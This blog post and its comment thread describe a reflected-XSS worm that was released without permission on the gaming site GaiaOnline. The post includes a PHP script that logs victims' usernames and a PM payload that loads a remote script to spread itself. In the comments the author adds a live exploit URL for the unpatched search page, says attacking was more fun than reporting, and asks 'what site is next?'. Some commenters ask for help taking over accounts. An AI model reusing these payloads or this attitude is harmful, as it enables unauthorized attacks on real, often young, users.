XSS Worm strikes GaiaOnline

GaiaOnline is a highly popular web based game, a perfect target for an XSS worm. Exactly what Kyran sets out to do, with a little help from Kuza. I’ll be writing about his worm, why it’s so special, the results he’s collected and the response from GaiaOnline.

Normally when you consider an XSS worm, such as the infamous Samy worm, or lesser known IPB ones the one thing they have in common is how they spread. They abuse a filter flaw to store itself in some permanent storage system such as the users profile or the users sugnature. This worm differs in that it uses only reflective XSS holes.

A reflective XSS hole is one where the input you provided is not permanent but is only printed onto the page because it was one of your input variables, usually via GET or POST, in this case POST.

Back to the worm, Kyran was not interested in causing havoc, this worm is merely an experiment to see how much a non-permanent worm can spread on a site reach of 40% (source). First I’ll give you the logging script used.

log.php:

<head>
<title>Error!</title>
<meta http-equiv="refresh" content="0;url=http://www.gaiaonline.com">
</head>
<?php
// Declares file to log to.
$myFile = "log.txt";
// Set file handler. or end execution if file doesnt exist.
$fh = fopen($myFile, 'a') or die("can't open file");
//Take data sent via POST from start.js and put it in $stringData
$stringData = $_POST["username"];
// Write string to file.
fwrite($fh, $stringData);
// Add a tilde followed by newline to divide each entry.
$stringData = "~n";
fwrite($fh, $stringData);
fclose($fh);

?>

As you can see he only logged the username, as he was not interesting in actually taking control of any accounts. Sadly no timestamp was set by each record, but I’m hedging my bets that next time there will be :p.

Now, onto the more juicy bits, the worm. It’s not long code (you won’t have to wade through something Samy like again). In short it does this:

  1. Create content to replace the page by
  2. Set up an AJAX object
  3. Create the variables used to send a PM (sending the PM to everyone in their friends list)
  4. Send the PM.

Gaia have a feature that if you send your PM to friends@gaia then the PM actually goes to everyone in your friends list, this allowed for an obvious shortcut in coding, but the worm would be perfectly possible without this, it would just require one extra AJAX request and some parsing. The payload of the PM is as follows:

“><script defer xsrc=//gaiaonli.site.com/start.js></script><style> (url changed)
As you can see it just pulls in the script again and again sends the PM to everyone in the friends list. I’ve got a copy of the script here, I have changed the url of log.php and start.js in the code, but otherwise this is what start.js would have looked like.

That’s the worm. It can be argued that it is a persistant attack as it is stored in a PM, but as Kyran said “the XSS is reflective, just the propogation method is persistant. But, that’s just semantics”.

What was logged through this worm? Kyran ran the worm for 3-4 hours (with a central .js file it’s easy to stop the worm) and logged 1500 unique usernames, but not much more can be deduced in terms of growth over time due to the lack of timestamps. Since the passwords weren’t logged we cannot check statistics on those, but I would hazard a guess at the statistic being similair to those of sites like MySpace. Furthermore, the point of this exercise was to see how well a reflective XSS worm can spread on a large site.

Kyran did post the worm (code included) on their forum, but that was quickly taken down by one of their mods. He created a new thread without the code in it, which has stayed up. Here’s Kyrans summary of the second thread “the staff haven’t posted anything. It’s mostly people calling me a terrorist”. As of yet they haven’t contacted him for any details (it is possible the mod who took down the first thread kept a copy of the code in which case there is no need to contact Kyran if all they want to do is patch the hole).

What can be understood from this whole incident? Reflective XSS can viably be used to spread an effective worm and sending variables via POST does not make people any safer. Considering how very common reflective XSS is (34 pages of reflective XSS flaws) this is something web masters really need to start getting to grips with. Furthermore it’s clear that Gaiaonline aren’t ready for users reporting flaws, they don’t know what to do when a flaw is reported and they aren’t too quick at fixing them (at the time of writing the flaw is still up).

Now… what site is next?

Share
  • Anonymous

    What is Reach?

    Reach measures the number of users. Reach is typically expressed as the percentage of all Internet users who visit a given site. So, for example, if a site like yahoo.com has a reach of 28%, this means that if you took random samples of one million Internet users, you would on average find that 280,000 of them visit yahoo.com. Alexa expresses reach as number of users per million. Alexa’s one-week and three-month average reach are measures of daily reach, averaged over the specified time period. The reach rank is a ranking of all sites based solely on their reach. The three-month changes are determined by comparing a site’s current reach and reach rank with its values from three month ago.

    Note that the graph says reach (per million) not reach (in millions). Take a look at Alexa’s data for Yahoo. If reach was users in million–like you moronically think–yahoo would be getting nearly 300,000 MILLION users a day… which is significantly more users than people on the planet! (~6.5 billion) Even if it was hits (in millions) you are talking about 45 hits for every person on the planet. Take the reach number, divide by a million, viola you have a percentage of “internet users” that gaiaonline gets in a day. We can leave the selection bias of alexa’s traffic information for another time…

  • http://www.whiteacid.org Sid

    Thanks, I did think it looked too high. My fault. I’ll edit the post.

  • http://www.script-sys.net/ Arethic (nate)

    The main issue isn’t the fact as much as users don’t know how to report these problems (personally I’ve pissed around with a few myself (Example here), but the fact that they exist to begin with :/

    One major issue with Gaia is that is does push out new features often, and does okay generally with most of the shit, but tends to fall back on the sanitization too often.

    On a personal opinion, I can relate and understand the want to show a proof of concept issue, but personally I think ethically it coulda been done a bit better, cause the users on the site are mostly young, and clueless, and all this led to was a shit storm of “OMG WHAT HAPPENED?!?”.

    Personally I just prefer to nag a developer when I find one.

    Though I would rather see for the day when they actually either review their own code, or have someone review it for them to keep an eye for the damn exploits :/

  • http://www.whiteacid.org Sid

    While of course they shouldn’t exist to begin with, the odd one will occasionally slip through. As for their track record, that’s not something I would know about.

    Reporting the flaw may have worked, but isn’t this just so much more fun? Also… passwords weren’t logged and the user shouldn’t really have known anything happened (other than getting a strange PM), so I doubt it caused that much disturbance.

    Oh and they at least tried fixing it. You can no longer break out of the input element as < and > aren’t working, but you can use event handlers as follows:
    http://www.gaiaonline.com/community/search.php?type=&val=%22%20onmouseover=%22alert('xss‘);%22%20%22

    As Kyran says: “I haven’t been contacted, nor punished. But they seem to have tried to fix it.”

  • http://www.script-sys.net/ Arethic (nate)

    I’m pretty familiar with the track record sadly, I’ve found a few and reported them throughout the good time I’ve been on there.

    Mmmm, for me generally, I prefer keeping my exploits secret until I report it and know its fixed, that way other people can’t exploit it before it gets fixed (the main issue is the time it takes for a developer to get to his project, and commit the changes fully).

    As for kyran, he likely won’t get punished ultimately, unless its found he did log passwords and used said passwords to access any accounts, then they’d be pissed, but even with as silly (in my opinion : P) of this way it was done, they are likely happy the fact it got fixed now without major exploitation in the worse ways it could have been done.

  • Mr.Riddles

    so… Your the one’s who screwed up gaiaonline. Or atleast for alittle bit. Well now, the way you screwed it up may have been complex for me. But we shall see if you can try again. In my opinion you screwed gaia with a practice test? Pathetic scenile bastard!

  • Admin Vince

    You will regret ever testing and making fun of gaiaonline.

  • http://www.whiteacid.org Sid

    Thanks for that very friendly comment, showing just how well you read the very first paragraph of my post. I really hope you aren’t representative of the Gaians as a whole.

  • The Question

    This little stunt will be posted and spread through gaia. You will be at your worst you piece of crap.

  • The Question

    Well now, so far only I have known. I read everything. Not twice but why’d you do it? What is your goal.

  • http://www.whiteacid.org Sid

    Why did Kyran make this worm? As I said in the post, to see how effective an XSS worm can be when using a reflective XSS as a means of growth.
    This did not mess up Gaias site, no settings in any profiles were changed, nothing permanent was done, no passwords were logged. The fact that the flaw exists does not make the Gaia admins look bad, a lot of major sites have XSS flaws, they do slip through the radar occasionally, that is understandable.

    What does make the admins look bad is that the flaw is still open (see http://blogs.securiteam.com/index.php/archives/786#comment-58101).

  • The Question

    So then, you just did that to prove how flawed gaiaonline was? You ddint intend to harm it. Just prove to them that they need to work on somethings?

  • http://www.whiteacid.org Sid

    I’ll say it again; I wrote this summary, nothing more.
    I think that was only a very minor goal. The other was to test a worm of this type (which as far as I know hasn’t been used before). GaiaOnline wasn’t picked on, MySpace could have been used too, Orkut, Tribalwars or one of many other sites could all have been potential targets.

  • http://www.script-sys.net/ Arethic (nate)

    *sigh* All you twits, just don’t post, seriously.

    They didn’t even ‘Mess up’ Gaia, it ultimately didn’t even do any damage outside of though it was one of the reasons I’m sure they are killing the whole friends@gaia system (again).

    Gaia itself, doesn’t even need to be ‘proved’ to that it has flaws, they know, they just don’t fix them generally because they aren’t openly hit like this.

    Sid: On a side note, no, none of those morons are Gaia’s administration or representatives at all.

    While the admins may not be quick to fix the flaw, they are at least generally respective to not troll and flame.

  • The Question

    Arethic (nate:) Look, I’m not a moron nor am I a twit. And second, I never said I was representing gaiaonline admins or anything. You seriously have issues I know but see knowing this I didnt have to do a thing.

    Sid: I left you at your work.

    Arethic: oh and btw I bet your just a retard who has no life what so ever and is trying to prove that you need some help.

  • http://www.script-sys.net/ Arethic (nate)

    *laughs* What a joke, I wasn’t even referring to you about the whole ‘representing Gaia’ thing actually, but just because you thought so, yes you are now officially a moron, sorry.

    *shrugs* I have a life, which is one reason I actually know what I’m talking about and you don’t, and can respect the aspects of Proof of Concept exploitations, and all you can do is bad mouth on it ignorantly. You post behind a silly name and thats it, I have no reason to hide who I am, I’ve done stuff big and made it popular, what have you succeeded in besides being an apparent troll?

    I don’t see anything I did that ‘Proved I need help’, if I needed help, I wouldn’t be here discussing this the way it should have been discussed towards sid, before you others came along with the petty comments.

  • http://www.gaiaonline.com Gaia Mom

    Yay! Worms that can help assholes take toys away from kids! Great idea!

    Not.

  • http://www.whiteacid.org Sid

    What do you mean by “take toys away from kids”?

    Edit: Do you mean that people could easily modify this worm to do some damage to gaiaonline and because of that people shouldn’t make these kind of proof of concepts? You mean like electricity should never have been made public as people can use it to electrocute people?

    ¬_¬

  • Former Gaian

    This is kinda funny to see some people taking offense to this, I’m more then sure that if you wanted to use this worm in a more destructive way and had the mental capacity to, that your goals would be set a little higher then a “child’s toy”. An attack wasn’t made on Gaia, this was merely a test of a XSS worm on a highly populated web based game, which in my opinion could be graciously considered a healthy warning of exploitable flaws. Further more that it was used and posted on a site were most users wouldn’t have a clue as how to use it or edit it for malicious purposes as apposed to lets say myspace is only evidence of the innocences of this program and its maker :P

    Sadly after writing all of this I see that this is long since dead but what the heck I wrote it i’m posting it

  • Janez

    Can u please tell me how to use this or can someone take the control of an account for me? please mail me!

  • Janez

    Contact me in Gaia my name is Cacafeona

  • Josh

    One thing I find strange is that the web is almost totally silent about a samy-like worm that plagued gaia a year before this one. Well, I for one remember it. I destroyed a bunch of CSS on people’s profiles replacing it with the worm.

  • cdnmeaa7

    I’ve got to say I’m very impressed that you guys figured and set this up. Many people are extremely pissed about this which makes me laugh, because if you think about it, it’s just a game. Although i didn’t understand most of that programing stuff, I know a lot more about it now then i did before, so thanks for the explanation designed for dunces like me. Hope you appreciate a little positive feed back.

  • jwells10

    were do i put these codes at

  • Miss Queen K

    Wooooow, some people need a life.
    I’m referring to the idiots who are trolling and asking how to use this bug for harm. As for the author and experiment conducter; I think you’ve done an excellent job at helping to warn us naive Gaians about our security risks and how easily we can be duped. Good job (Y) !